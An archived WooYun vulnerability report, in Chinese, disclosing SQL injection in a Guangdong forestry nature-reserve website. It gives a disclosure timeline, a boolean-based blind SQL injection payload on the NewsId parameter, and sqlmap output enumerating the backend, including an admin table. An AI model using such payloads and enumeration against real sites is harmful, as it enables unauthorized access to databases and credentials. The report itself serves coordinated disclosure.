乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-21: 细节已通知厂商并且等待厂商处理中 2015-10-23: 厂商已经确认,细节仅向厂商公开 2015-11-02: 细节向核心白帽子及相关领域专家公开 2015-11-12: 细节向普通白帽子公开 2015-11-22: 细节向实习白帽子公开 2015-12-07: 细节向公众公开
广东省林业局某站存在SQL注射
广东自然保护区存在SQL注射。http://**.**.**.**/NewsDetail.aspx?NewsId=20151013_170730
sqlmap identified the following injection points with a total of 161 HTTP(s) requests:---Parameter: NewsId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: NewsId=20151013_170730' AND 2620=2620 AND 'rxVf'='rxVf---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft Accesssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: NewsId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: NewsId=20151013_170730' AND 2620=2620 AND 'rxVf'='rxVf---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[1 table]+-------+| admin |+-------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: NewsId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: NewsId=20151013_170730' AND 2620=2620 AND 'rxVf'='rxVf---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb+-------+---------+| Table | Entries |+-------+---------+| admin | 168 |+-------+---------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-23 10:45
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无